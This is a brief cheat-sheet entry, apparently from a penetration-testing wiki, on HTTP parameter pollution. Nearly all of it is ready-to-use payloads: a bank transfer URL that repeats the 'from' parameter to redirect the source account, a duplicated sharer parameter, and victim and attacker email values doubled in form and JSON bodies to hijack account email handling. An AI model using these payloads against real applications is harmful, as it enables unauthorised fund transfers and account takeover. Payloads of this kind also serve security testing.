HTTP Parameter pollution

# Inject existing extra parameters in GET:
https://www.bank.com/transfer?from=12345&to=67890&amount=5000&from=ABCDEF
https://www.site.com/sharer.php?u=https://site2.com/blog/introducing?&u=https://site3.com/test

email=victim@mail.com&email=attacker@mail.com
{"email":["victim@mail.com","attacker@mail.com"]}
{"email":"victim@mail.com","email":"attacker@mail.com"}

PreviousEmail attacks NextSSTI

Last updated 1 year ago